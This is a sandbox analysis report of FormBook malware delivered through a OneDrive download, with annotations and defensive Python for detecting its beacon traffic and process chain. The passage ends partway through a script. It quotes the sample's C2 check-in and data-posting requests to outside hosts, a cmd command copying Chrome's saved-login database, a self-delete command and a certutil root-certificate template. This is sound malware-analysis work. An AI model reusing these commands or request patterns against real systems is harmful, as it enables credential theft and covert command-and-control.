
Analysis Report https://onedrive.live.com/download?cid=3447601AB357F8C1&resid=3447601AB357F8C1%21113&authkey=APBubBSchh7xEpo

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:225598
Start date:27.04.2020
Start time:16:30:32
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 46s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:browseurl.jbs
Sample URL:https://onedrive.live.com/download?cid=3447601AB357F8C1&resid=3447601AB357F8C1%21113&authkey=APBubBSchh7xEpo
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed:21
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • EGA enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spyw.evad.win@27/21@8/2
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, ielowutil.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 23.77.210.216, 13.107.42.13, 13.107.42.12, 152.199.19.161, 205.185.216.10, 205.185.216.42, 2.18.68.82
  • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, ie9comview.vo.msecnd.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, l-0004.l-msedge.net, iecvlist.microsoft.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, go.microsoft.com, l-0003.l-msedge.net, go.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy:Threshold
Score:100
Range:0 - 100
Whitelisted:false
Threat:FormBook
Detection:malicious

Confidence

Strategy:Threshold
Score:5
Range:0 - 5
Further Analysis Required?:false


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Listed per tactic. Digits in square brackets are the report's per-technique signature-hit badges, one badge per digit as displayed; techniques without a bracket had no hits and are only the matrix template. The Exploitation for Client Execution hits come from the "Potential browser exploit detected" signature, which is a sandbox-helper artifact (see Software Vulnerabilities).

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link
Execution: Command-Line Interface [2]; Execution through Module Load [1]; Exploitation for Client Execution [1 1]; Graphical User Interface [1]
Persistence: Registry Run Keys / Startup Folder [1]; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service
Privilege Escalation: Process Injection [5 1 2]; Accessibility Features; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service
Defense Evasion: Masquerading [1]; Software Packing [2]; Disabling Security Tools [1]; Virtualization/Sandbox Evasion [3]; Process Injection [5 1 2]; Obfuscated Files or Information [1]
Credential Access: Credential Dumping [1]; Input Capture [1]; Credentials in Files; Account Manipulation; Brute Force
Discovery: Virtualization/Sandbox Evasion [3]; Process Discovery [2]; Security Software Discovery [2 1 1]; Remote System Discovery [1]; File and Directory Discovery [2]; System Information Discovery [1 3]
Lateral Movement: Remote File Copy [3]; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software
Collection: Email Collection [1]; Input Capture [1]; Man in the Browser [1]; Data from Local System [1]; Data Staged; Screen Capture
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Remote File Copy [3]; Standard Non-Application Layer Protocol [4]; Standard Application Layer Protocol [4]; Multiband Communication; Standard Cryptographic Protocol; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

Signature Overview



AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\G7nl84b3\zx4pbev1pyv_h.exe | Virustotal: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\G7nl84b3\zx4pbev1pyv_h.exe | ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe | Virustotal: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe | ReversingLabs: Detection: 41%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\G7nl84b3\zx4pbev1pyv_h.exe | Joe Sandbox ML: detected
Note: SWIFTCOPY.exe is the sample unpacked from the downloaded archive; zx4pbev1pyv_h.exe is the file explorer.exe writes and launches later in the run. Identical detection ratios here, identical .text entropy (Data Obfuscation) and identical RDTSC check offsets (Malware Analysis System Evasion) are consistent with the second file being a copy of the first.

Software Vulnerabilities:

Potential browser exploit detected (process start blacklist hit)
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Windows\SysWOW64\unarchiver.exe
Note: unarchiver.exe, and the 7za.exe it runs with the password "infected", is the sandbox's own archive-extraction helper, launched by the browseurl cookbook to unpack SWIFTCOPY.zip after Internet Explorer downloaded it from the OneDrive URL. The hit reflects the analysis harness, not an exploit against the browser; the sample proper is the SWIFTCOPY.exe inside the archive.

Networking:

HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected:
  GET /jh8/?b4n8y=VX8P68WEHAq6tLLijdRoafFf7hWQqC2wXmINk69EIOzGZL0CgbaAV1it+uSyYclK2qrX&FB=GrD0f HTTP/1.1
  Host: www.dangchelan.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (no printable payload)
Source: global traffic | HTTP traffic detected:
  GET /jh8/?FB=GrD0f&b4n8y=Xibe6pgUDFnjBMPll5i5Z3A4BeCP4PPOtOBanROLhktMABG+y4XBLsbi2mGFug7mx+8R HTTP/1.1
  Host: www.dealspiper.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (no printable payload)
Note: both GETs use the same path (/jh8/), the same two parameter names (b4n8y, FB) and the same short value FB=GrD0f against two different hosts, each sent with Connection: close and without a User-Agent header; the POST below repeats the path and the b4n8y name. This is the check-in shape of FormBook, which walks a built-in list of domains of which typically only one is the live C2 and the rest are decoys, so neither host should be treated as confirmed C2 on the strength of this run alone.
Downloads files from webservers via HTTP
Source: global traffic | the same two GET requests listed under the previous signature.
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Posts data to webserver
Source: unknown | HTTP traffic detected:
  POST /jh8/ HTTP/1.1
  Host: www.dealspiper.com
  Connection: close
  Content-Length: 411
  Cache-Control: no-cache
  Origin: http://www.dealspiper.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.dealspiper.com/jh8/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Body (the report's hex dump decoded; trailing 0x00 bytes dropped):
  b4n8y=fAXkkOR2HgChVre84cbQGAcgDtvb7vKKzLtfywKsxBtUXSTugdmkEIaFpFqEu1PP4-he2VJNuVatOmQsszNanIK-DIMxLpf2tcTY~qhRDHMMhmR0JYFM3kFpSMW90SsHPBi8xD(Y7C9xKAZ7evslrU4muODtzD8CMKL1XV6luoFujfLsHkk1lJh4cC0PFJO4mKz-6jYm1FQNEyJhMKMOI0mDibKl3ANCquynZFmU739DzcnqmlllJOeKSOGHiVvVeDXwozfhSlHbhkN2lJjECi8ze6JUN5vEt68hIeaXOcy9T2c_yik9W7bixbp-O90s5tX_rLd5~Pl3pmZD25Z0UpX_PAXk8z9RE_IGhBzyNB~1EjTZ7-DbDgps72IpOJoe2iSpNtWaJ_w7wVs2oQ).
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html
  Server: Microsoft-IIS/7.5
  X-Powered-By: ASP.NET
  Date: Mon, 27 Apr 2020 14:32:26 GMT
  Connection: close
  Content-Length: 1163
  Body (the report's hex dump decoded as gb2312, the charset the page declares; the dump is cut off mid-page in the report; Chinese strings translated in brackets):
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  <html xmlns="http://www.w3.org/1999/xhtml">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=gb2312"/>
  <title>404 - 找不到文件或目录。</title>   [404 - File or directory not found.]
  <style type="text/css">
  <!--
  body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
  fieldset{padding:0 15px 10px 15px;}
  h1{font-size:2.4em;margin:0;color:#FFF;}
  h2{font-size:1.7em;margin:0;color:#CC0000;}
  h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
  #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
  background-color:#555555;}
  #content{margin:0 0 0 2%;position:relative;}
  .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
  -->
  </style>
  </head>
  <body>
  <div id="header"><h1>服务器错误</   [Server error]   (hex dump ends here in the report)
Note: this is the stock Chinese-locale IIS 7.5 error page, i.e. the contacted host had no handler at /jh8/, which is what the "Some HTTP requests failed (404)" line under Analysis Advice refers to. The report does not say which of the two hosts returned it.
Urls found in memory or binary data
Source: explorer.exe | String found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/
Source: explorer.exe | String found in binary or memory: http://ns.adob
Source: explorer.exe | String found in binary or memory: http://ns.microsoft
Source: explorer.exe | String found in binary or memory: http://www.%s.com
Source: cmstp.exe | String found in binary or memory: http://www.msn.com/
Source: cmstp.exe | String found in binary or memory: http://www.msn.com/de-ch/
Source: cmstp.exe | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: cmstp.exe | String found in binary or memory: https://gemihq.dm.files.1drv.com/y4mtf0iBMjW4AqPxlsG5R09UA2Sv7gGrULcn39ef3NlGT0SjM_ogtGyu9cLoFCaUVqw
Source: cmstp.exe | String found in binary or memory: https://www.msn.com/content/images/icons/Favicon_EdgeStart.ico
Source: cmstp.exe | String found in binary or memory: https://www.msn.com/spartan/ientp
Source: cmstp.exe | String found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
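As an added example written for this page (not part of the report or of any Joe Sandbox tooling), the Python below parses the three requests above into their components, derives the features the signatures in this section are built on (missing User-Agent, Connection: close, a short single-segment path, one short and one long query value), correlates them across hosts, and decodes a Joe Sandbox "Data Raw" hex dump back into text using the charset the page declares. The inputs are constructed from the report: the POST body is shortened, and the hex excerpt covers only the <meta> and <title> lines of the 404 page.

```python
import re

# Constructed samples transcribed from the requests and the 404 response in this
# report. The POST body is shortened; only the <meta> and <title> lines of the
# response are included in the hex excerpt.
SAMPLE_REQUESTS = [
    "GET /jh8/?b4n8y=VX8P68WEHAq6tLLijdRoafFf7hWQqC2wXmINk69EIOzGZL0CgbaAV1it+uSyYclK2qrX&FB=GrD0f HTTP/1.1\r\n"
    "Host: www.dangchelan.com\r\nConnection: close\r\n\r\n",
    "GET /jh8/?FB=GrD0f&b4n8y=Xibe6pgUDFnjBMPll5i5Z3A4BeCP4PPOtOBanROLhktMABG+y4XBLsbi2mGFug7mx+8R HTTP/1.1\r\n"
    "Host: www.dealspiper.com\r\nConnection: close\r\n\r\n",
    "POST /jh8/ HTTP/1.1\r\nHost: www.dealspiper.com\r\nConnection: close\r\nContent-Length: 411\r\n"
    "Cache-Control: no-cache\r\nOrigin: http://www.dealspiper.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
    "Referer: http://www.dealspiper.com/jh8/\r\nAccept-Language: en-US\r\nAccept-Encoding: gzip, deflate\r\n\r\n"
    "b4n8y=fAXkkOR2HgChVre84cbQGAcgDtvb7vKKzLtfywKsxBtUXSTugdmkEIaFpFqEu1PP4-he2VJNuVatOmQsszNanIK",
]

# <meta ... charset=gb2312"/>\r\n<title>404 - ...</title>\r\n, as hex in the report
SAMPLE_404_HEX = (
    "3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 "
    "63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 "
    "31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 "
    "c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a"
)

BEACON_PATH = re.compile(r"/[a-z0-9]{2,5}/")   # single short directory, e.g. /jh8/


def parse_http_request(raw):
    """Split a raw request into method, path, query params, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # Split by hand: parse_qsl would turn '+' inside the opaque values into spaces.
    params = dict(kv.split("=", 1) if "=" in kv else (kv, "") for kv in query.split("&") if kv)
    return {"method": method, "path": path, "params": params, "headers": headers, "body": body}


def beacon_features(req):
    """The request-shape features the report's networking signatures rest on."""
    vals = sorted(req["params"].values(), key=len)
    return {
        "no_user_agent": "user-agent" not in req["headers"],
        "connection_close": req["headers"].get("connection", "").lower() == "close",
        "short_path": BEACON_PATH.fullmatch(req["path"]) is not None,
        # one short id-like value plus one long opaque blob
        "id_plus_blob": len(vals) == 2 and len(vals[0]) <= 8 and len(vals[1]) >= 40,
    }


def correlate(raw_requests):
    """Correlate path, parameter names and UA presence across all hosts seen."""
    reqs = [parse_http_request(r) for r in raw_requests]
    names = set()
    for r in reqs:
        names.update(r["params"])
        if r["method"] == "POST":
            names.update(kv.split("=", 1)[0] for kv in r["body"].split("&") if kv)
    return {
        "paths": {r["path"] for r in reqs},
        "hosts": sorted({r["headers"].get("host", "") for r in reqs}),
        "param_names": names,
        "gets_without_ua": [r["headers"]["host"] for r in reqs
                            if r["method"] == "GET" and "user-agent" not in r["headers"]],
        "posts_with_ua": [r["headers"]["host"] for r in reqs
                          if r["method"] == "POST" and "user-agent" in r["headers"]],
        "beacon_like": [r["headers"]["host"] for r in reqs if all(beacon_features(r).values())],
    }


def decode_joe_hex(hexdump):
    """Turn a Joe Sandbox 'Data Raw' hex dump back into bytes, dropping 0x00 padding."""
    return bytes.fromhex(hexdump).rstrip(b"\x00")


def html_title(body):
    """Decode an HTML body with the charset it declares and return (charset, title)."""
    m = re.search(rb"charset=([A-Za-z0-9_-]+)", body)
    charset = m.group(1).decode("ascii").lower() if m else "latin-1"
    text = body.decode(charset, errors="replace")
    t = re.search(r"<title>(.*?)</title>", text, re.S)
    return charset, (t.group(1) if t else None)


if __name__ == "__main__":
    for key, value in correlate(SAMPLE_REQUESTS).items():
        print(f"{key}: {value}")
    print(html_title(decode_joe_hex(SAMPLE_404_HEX)))
```

The `beacon_like` list is the practical output: only the two GETs satisfy every feature at once, and the same `/jh8/` path and `b4n8y` name reappear in the POST, which is the cross-host correlation a detection rule should key on rather than either domain by itself.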

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: SWIFTCOPY.exe | Binary or memory string: "<HOOK MODULE='DDRAW.DLL' FUNCTION='DirectDrawCreateEx'/>"
Note: the string is an XML hook descriptor naming DirectDrawCreateEx in ddraw.dll, not a DirectInput object; on its own it does not show keystroke capture.

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\cmstp.exe | Dropped file: C:\Users\user\AppData\Roaming\23OP2RPA\23Ologri.ini
Source: C:\Windows\SysWOW64\cmstp.exe | Dropped file: C:\Users\user\AppData\Roaming\23OP2RPA\23Ologrf.ini
Source: C:\Windows\SysWOW64\cmstp.exe | Dropped file: C:\Users\user\AppData\Roaming\23OP2RPA\23Ologrv.ini
PE file contains strange resources
Source: SWIFTCOPY.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: zx4pbev1pyv_h.exe.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\cmstp.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Uses a Windows living-off-the-land binary (LOLBin)
Source: unknown | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Note: cmstp.exe is started with an empty argument list, whereas a legitimate Connection Manager profile install passes an .inf file (cmstp.exe /s profile.inf). Everything attributed to cmstp.exe in this report (the Firefox and Outlook registry lookups, the dropped .ini files, the Run-key write, the RDTSC checks, the cmd.exe children) is the injected payload running inside it; the binary serves as an injection host and none of its own functionality is used. cmmon32.exe, started the same way later in the run, plays the same role.
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
Source: SWIFTCOPY.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: zx4pbev1pyv_h.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification label
Source: classification engine | Classification label: mal100.spyw.evad.win@27/21@8/2
Creates files inside the user directory
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B7FD0DBA-8893-11EA-AAE6-9CC1A2A860C6}.dat
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2880:120:WilError_01
Note: SM0:<pid>:120:WilError_01 mutants are created by every conhost.exe instance on Windows 10 and carry no signal here.
Creates temporary files
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\~DFB169AA6D356022FB.TMP
Parts of this application use the VB 6.0 runtime library (probably written in Visual Basic)
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Parts of this application use the .NET runtime (probably written in C#)
Source: C:\Windows\SysWOW64\unarchiver.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\unarchiver.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\unarchiver.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Note: the .NET loads belong to unarchiver.exe, the sandbox's extraction helper, not to the sample, which is a VB6 executable (msvbvm60.dll above).
Reads ini files
Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\SysWOW64\unarchiver.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported twice)
Source: C:\Windows\SysWOW64\cmstp.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample might require command line arguments
Source: 7za.exe | String found in binary or memory: api-ms-win-stateseparation-helpers-l1-1-0
Source: unarchiver.exe | String found in binary or memory: -install
Source: SWIFTCOPY.exe | String found in binary or memory: "/k certutil.exe -f -enterprise -v -addstore Root '%s'"
Source: SWIFTCOPY.exe | String found in binary or memory: "The device has succeeded a query-stop and its resource requirements have changed."
Source: explorer.exe | String found in binary or memory: /launcher/view/group
Note: this is a string heuristic and the advice to rerun with arguments does not follow from it. The 7za.exe and unarchiver.exe strings come from the sandbox helpers, the query-stop text is a stock Windows error message, and the certutil.exe line is a command template the sample carries for adding a certificate to the machine Root store (certutil -addstore Root), a capability worth noting in its own right rather than a switch the sample needs in order to start.
Spawns processes
Process tree reconstructed from the entries below. <Temp> stands for C:\Users\user\AppData\Local\Temp; the conhost.exe instances that accompany each console process are left out; "parent not recorded" marks processes the report lists with source "unknown" only.
  iexplore.exe -Embedding
    iexplore.exe SCODEF:5032 CREDAT:17410 /prefetch:2
    unarchiver.exe SWIFTCOPY.zip   (sandbox helper)
      7za.exe x -pinfected -y -o<Temp>\ysx3qeyd.sxv SWIFTCOPY.zip   (sandbox helper)
      cmd.exe /C <Temp>\ysx3qeyd.sxv\SWIFTCOPY.exe   (sandbox helper)
        SWIFTCOPY.exe
          SWIFTCOPY.exe   (second instance of itself)
  explorer.exe   (already running; SWIFTCOPY.exe maps code into it, see the HIPS section)
    zx4pbev1pyv_h.exe   (from C:\Program Files (x86)\G7nl84b3\)
      zx4pbev1pyv_h.exe   (second instance of itself)
  cmstp.exe   (parent not recorded; started with no arguments)
    cmd.exe /c del <Temp>\ysx3qeyd.sxv\SWIFTCOPY.exe
    cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" <Temp>\DB1 /V
  cmmon32.exe   (parent not recorded; started with no arguments)
The del removes the original dropper once its code is running in other processes. The copy takes Chrome's login database out of the profile directory, the usual way to read it while Chrome holds the file open, into <Temp>\DB1 for offline extraction; this is the Credential Dumping hit in the matrix.
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (four instances)
Source: unknown | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5032 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Windows\SysWOW64\unarchiver.exe 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\O0N4T4W6\SWIFTCOPY.zip'
Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\7za.exe 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv' 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\O0N4T4W6\SWIFTCOPY.zip'
Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe | Process created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe
Source: C:\Windows\explorer.exe | Process created: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe
Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'
Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe | Process created: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe
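The process chain above can be triaged mechanically. The Python script below is an added example written for this page, not part of the Joe Sandbox report or of the sample. It transcribes the report's process-creation entries into constructed Sysmon-style events (the pid/ppid numbers are invented, since the report shows none, and the conhost.exe instances are omitted) and applies four rules matching what this run shows: a process starting a second instance of itself, cmstp.exe or cmmon32.exe started with an empty argument list, cmd.exe deleting a binary that was itself executed earlier in the run, and cmd.exe copying a browser credential store. The Firefox logins.json and Chrome Web Data names are included as a generalisation beyond the Chrome Login Data file seen here. The sandbox helper processes trigger none of the rules.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events transcribed from the
# "Spawns processes" entries of this report. The pid/ppid numbers are invented
# (the report lists none), conhost.exe instances are omitted, and ppid 0 marks
# a parent the report does not record ("unknown") or a pre-existing process.
EVENTS = [
    # (pid, ppid, image path, command line as the report renders it)
    (1, 0, r"C:\Program Files\internet explorer\iexplore.exe",
     r"'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding"),
    (2, 1, r"C:\Windows\SysWOW64\unarchiver.exe",
     r"'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\O0N4T4W6\SWIFTCOPY.zip'"),
    (3, 2, r"C:\Windows\SysWOW64\7za.exe",
     r"'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv' 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\O0N4T4W6\SWIFTCOPY.zip'"),
    (4, 2, r"C:\Windows\SysWOW64\cmd.exe",
     r"'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'"),
    (5, 4, r"C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe",
     r"C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe"),
    (6, 5, r"C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe",
     r"C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe"),
    (7, 0, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    (8, 7, r"C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe",
     r"C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe"),
    (9, 8, r"C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe",
     r"C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe"),
    (10, 0, r"C:\Windows\SysWOW64\cmstp.exe", r"C:\Windows\SysWOW64\cmstp.exe"),
    (11, 10, r"C:\Windows\SysWOW64\cmd.exe",
     r"/c del 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'"),
    (12, 10, r"C:\Windows\SysWOW64\cmd.exe",
     r"/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V"),
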